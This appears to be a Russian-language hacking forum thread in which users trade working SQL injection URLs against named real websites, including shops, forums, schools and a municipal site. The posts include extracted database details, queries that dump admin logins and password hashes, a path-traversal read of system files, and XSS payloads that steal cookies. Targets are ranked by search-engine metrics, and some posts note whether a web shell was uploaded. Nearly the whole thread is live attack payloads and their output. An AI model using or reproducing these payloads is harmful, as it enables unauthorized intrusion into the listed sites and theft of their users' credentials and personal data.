SQL Инъекции

Code:

http://stitch.kh.ua/index.php?section=products&action=list&category=49%20and%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28%20Select%20COLUMN_NAME%20FROM%20information_schema.COLUMNS%20WHERE%20TABLE_NAME=0x75736572%20and%20TABLE_SCHEMA=0x7374697463685f73686f70%20%20limit%200,1%29,floor%28rand%280%29*2%29%29%29%23

админко /admin

CMS MIB 2008

ветка 5.0.51a-24+lenny2-log, БД stitch_shop, user stitch@localhost, сервер debian-linux-gnu

columns user
idс login password userid usergroupid membergroupids displaygroupid username password passworddate email1 styleid parentemail1 homepage icq aim yahoo1...

БД
information_schema belson rpo_itstep_forum stitch?shop stitch_forum stitch_oscommerce stitch_shop

Code:

http://hsr.kh.ua/services/main/index.php?go=index-2&type=2%20and%200%20union%20select%20111111111111%23&add=index22

Code:

http://www.news2news.com/vfp/?group=13+and+5=@@version--+&=0&PHPSESSID=a8c7ba850a36c4fceef6149ec16a7424 -> true

http://www.news2news.com/vfp/?group=13+and+4=@@version--+&=0&PHPSESSID=a8c7ba850a36c4fceef6149ec16a7424 -> false

www.news2news.com:sarcastic_hand: на нём итак повсюду ошибки и бес иньекции.

Code:

http://www.imaginenative.org/gallery_preview.php?id=24&y=99%27%20+%20and%201=%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28version%28%29,floor%28rand%280%29*2%29%29%29--+

Duplicate entry '5.0.851' for key 1

portbld-freebsd7.21

columns table login:
login_fname login_lname username password

columns table clients:
id client_role client_contact_first_name client_contact_last_name client_aboriginal
client_indigenous_affiliation lient_company_name client_street client_city client_province
client_postalcode client_country client_phone_type client_phone_country_code client_phone
client_phone_ext client_phone_type client_fax client_email client_web client_artist_bio client_artist_other_works
client_ts client_call_id client_address_type lient_address_unit client_street_Part2 client_main_contact
client_phone1_area_code client_phone1_part_one client_phone1_part_two client_phone2_area_code client_phone2_part_one client_phone2_part_two client_fax_area_code client_fax_part_one

Code:

http://www.abbeyfield.ca/story.php?aid=54+union+select+1,2,3,4,5,6,7--+

db481269@localhost

information_schema:db481269

house_info
id:society_name:house_name:location:city:founded:capacity:contact:contact_phone:contact_email:cost:website:in

Code:

http://www.sierra.ca/news.php?id=25%20and%200%20union%20select%201,GROUP_CONCAT%28SCHEMA_NAME%20SEPARATOR%20%27:%27%29,3,4,5,6,7%20FROM%20information_schema.SCHEMATA--+

 

Code:

http://mercury.odessa.ua/details/32664%20union%20select%201,2,3,concat_ws%280x3a,version%28%29,database%28%29,user%28%29,@@version_compile_os%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23/

5.0.45:AllOde:WebSite@localhost:redhat-linux-gnu

БД
information_schema:AllOde:Evgen:dbwap:jom_:luzanovka_db:mysqlds17

PosOut:anketa:banners:extr:groups:job_rel:klvidjob:kodsng:kodukr:kodword:link_anketa:marshrut:message:navigator:newseoplehoneosin:rubricator:street:struode:tamoj:txtvals:user_info:vlastukr

user_info
id_user:name_userass_user:copy_password:mail_user:icq_userhone_user:url_user:city_user:firm_user:info_user

Code:

http://mercury.odessa.ua/details/32664 union select 1,2,3,concat_ws(0x3a,name_user,pass_user),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 FROM user_info limit 0,1/

Code:

http://mercury.odessa.ua/details/32664%20union%20select%201,2,3,aes_decrypt%28aes_encrypt%28pass_user,1%29,1%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20FROM%20user_info%20limit%201,1/

http://turniere.govb.de/bbc/ - тут pr0, а тут уже http://turniere.govb.de pr4 и тиц10

Через ошибку узнаем префикс таблиц со схемы это bbc_

Вытаскиваем данные 1-ого админа:

Code:

http://turniere.govb.de/bbc/e107_plugins/registration/playerlist.php?order=1,%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20user_loginname%20from%20bbc_user%20limit%200,1%29,0x3a,%28select%20user_password%20from%20bbc_user%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%29

Пасс сложный.

Вытаскиваем 2-ого админа:

Code:

http://turniere.govb.de/bbc/e107_plugins/registration/playerlist.php?order=1,%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20user_loginname%20from%20bbc_user%20where%20user_admin=1%20limit%201,1%29,0x3a,%28select%20user_password%20from%20bbc_user%20limit%201,1%29,0x3a,floor%28rand%280%29*2%29%29%29

Пасс легко брутабельный.
Но в админке прав нет, шелл не залит.


pr3

Code:

http://psphungary.hu/e107_plugins/nboard/nboard.php?cat=1%29%20and%201=%28select%201%20from%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20%20concat_ws%280x3a,user_loginname,user_password%29%20from%20e107_user%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%29y%29--+

Админка другая, шелл не залит.

pr2

Code:

http://www.kirovfishing.ru/e107_plugins/nboard/nboard.php?cat=1) and 1=(select 1 from (select count(*) from (select 1 union select 2 union select 3)x group by concat((select  concat_ws(0x3a,user_loginname,user_password) from e107_user limit 0,1),0x3a,floor(rand(0)*2)))y)--+

Прав нет, шелл не залит.

pr1

Code:

http://bagazniki.com.ua/index.php?id=688+and+%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28version%28%29,floor%28rand%280%29*2%29%29%29

pr4

Code:

http://www.pogoda.ua/index.php?id=4+and+0+union+select+1,concat_ws%280x3a,login,password%29,3,4,5+from+users+limit+0,1--+

pr3 => голубые заставили к кодировке нужной привести

Code:

http://www.menoboy.com/repertoire-videos-gays/extrait-video-gay.php?id=269+union+select+1,2,3,4,5,6,7,unhex%28hex%28concat_ws%280x3a,version%28%29,user%28%29,database%28%29,@@version_compile_os%29%29%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+

4.1.11:db1@localhost:db1:mandrake-linux-gnu

сори мб есть баян времени нет проверить.

 

Code:

[COLOR=White]http://mexco.ru/ind.php?pn=0&id_categ=-47+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+[/COLOR]

5.0.77-log:gecto756_mexco:gecto756_mexco@localhost
тиц 20
PageRank 2
Админка http://mexco.ru/Admin/
ps/ поищите поля))

Code:

[COLOR=White]http://kaktak.net/dosk/ind.php?pn=1&id_categ=-15+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+[/COLOR]

5.0.67-community:sdelka5_kaktak:sdelka5_sdelka5@localhost
тиц 150
PageRan 1

 

http://www.travelwheel.ru/runs/foto4.php?id=-1469+union+select+1,2,3,4,5,6,version(),8+--+
ТИЦ : 10 PR: 2

http://www.jks2000.ru/index.php?id=33+'+union+select+1,2,3,version(),5,6+--+
ТИЦ : 20 PR: 2

http://akmeo.rus.net/index.php?id=119+union+select+1+--+
ТИЦ : 50

http://www.piter-print.ru/index.php?id=3'
ТИЦ : 20

 

http://www.mwis.org.uk/webcams.php?cam=-15+union+select+1,2,version(),4,5,6--
http://www.aact.org.gh/newsite/pages/press/index.php?id=-10'+union+select+1,2,3,4,unhex(hex(versi

on())),6+order+by+'4


http://www.online.scouting.org.za/calendar/eventdisplay.php?id=-766+union+select+1,2,version()--

 

Code:

[COLOR=White]http://www.scotish.ru/board/ind.php?pn=2&id_categ=-42+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+[/COLOR]

4.1.22-standard-log:scotish_board:scotish_admin@localhost
тиц 10
PageRank 2

Code:

[COLOR=White]http://www.fazendeiro.ru/board/ind.php?pn=1&id_categ=-31+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+[/COLOR]

5.1.45:db1708c:[email protected]

Code:

[COLOR=White]http://www.fazendeiro.ru/board/ind.php?pn=1&id_categ=-31+union+select+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x70687062625f7573657273+--+[/COLOR]

Code:

[COLOR=White]http://www.fazendeiro.ru/board/ind.php?pn=1&id_categ=-31+union+select+1,2,3,4,5,username,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+FROM+phpbb_users+--+[/COLOR]

тиц 50

 

http://www.lankapetlovers.com/petInfo_details.php?infoId=-2510+union+select+1,2,concat(username,char(58),password),4+from+users

 

http://bazar-auto.ru/board/ind.php?pn=1&id_categ=1+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

PR:5
ТИЦ:160

 

http://www.hajosalfred.hu/eng/flow.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)--

http://www.helpersofmary.org/community.php?id=-17+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11--

http://www.collinsbuilders.net/community.php?id=-20+union+select+1,2,3,4--

http://www.wentworthseniorliving.com/wentworth/community.php?id=-2+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--


http://www.goxgo.ca/community.php?id=-11+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),7,8,9,10,11--


http://www.helpersofmary.org/community.php?id=-51+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11--

 

то что ты выложил- инжектом назвать сложно, запрос по твоей теме примерно должен был бы выглядеть вот так

Code:

http://bazar-auto.ru/board/ind.php?pn=1&id_categ=-1+union+select+1,2,3,4,5,concat(login,char(58),password),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+tbl_admin_users+--+

 

муниципальный сайт города АЛУШТА

муниципальный сайт города АЛУШТА


http://www.alushta.crimea.ua/rest/type_rest.php?type=-1+and+1=2+union+all+select+concat_ws(0x3a,login,password,email),2,3,4,5,6,7,8,9,10+from+users--

 

http://www.romenewsbywatson.com/inside.php?id=-62+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+adminusers+--+
PR: 3

http://www.bhcc.mass.edu/inside/inside.php?navID=132&id=257'+UnIon+selECt+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
ТИЦ : 10

http://www.finger-lakes-tours.com/inside.php?id=-167'+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+

http://www.awrad.org/einside.php?id=-4+union+select+1,2,3,4,5+--+

 

http://www.artspace.org.au/gallery_project.php?i=132+union+select+1,2,3,4,5,version%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

моя первая)
выложенная здесь

 

http://www.vpole.ru/press/?id=-1741+union+select+1,2,concat_ws%280x3a,user,passwd%29,4,5,6,7+from+users+limit+0,1--+
ТИЦ : 375 PR: 5

http://tatalc.ru/tatalc2/?pg=3&bl=1&md=2&iddoc=-17499'+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,login,passwd),7,8,9,10,11,12,13,14,15,16,17,18,19+from+access_users+limit+0,1--+
ТИЦ : 350

 

....

 

1,5к хэшей за один запрос))

http://bomond.net.ua/my/compare.php?id=131269+and+1=0+union+select+1,concat(@i:=0x00,@o:=0x0d0a,benchmark(1500,@o :=CONCAT(@o,0x0d0a,(SELECT concat(@i:=customers_password) from bomondlg_bomondshop.customers WHERE customers_password >@i order by customers_password LIMIT 1))),@o)

уберите где надо пробелы...
З.Ы. укоротил ссылку - http://is.gd/eNo1p
Заходить желательно через ФФ

 

http://www.clean-up.ru/cat.php?id=-511+union+select+group_concat%28table_name%29,2,3,4,5,6+from+information_schema.tables--+
ТИЦ : 20
Таблица admin : username,PASSWORD

 

http://www.rzeczna.pl/lineage.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75+--+

 

SQL Injection

http://mec1rgqh.panontrade.com/offers.php?id=885+and+1=0+union+select+1,2,3,4,5,6,group_concat(es_admin_name,char(58),es_pwd),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+esb2b_admin&file=Products&prod=sell&uid=mec1rgqh

читалка

входим в админку(http://panontrade.com/admin)

http://panontrade.com/admin/manage_pages.php?curr_page=passwd&curr_subdir=../../../../../../../../../../etc

XSS

и конечно же xss

http://panontrade.com
в поле поиска пишем "><script>alert()</script>

и еще один xss в админке, http://panontrade.com/admin/edit_link.php

в поле Contact Person пишем "><script>alert(document.cookie)</script>

 

http://ugc.sollies.free.fr/joo154/m/un.php?id=-472+union+select+TABLE_NAME,2,3,4,5,6+FROM+INFORMATION_SCHEMA.TABLES--

http://www.unostra.com/union.php?id=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

http://www.thailabordatabase.org/en/union.php?c=detail&id=-1312+union+select+1,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55--

http://www.unionradioirun.com/union.php?s=pro&s2=&pag=1&id=-197+union+select+database()--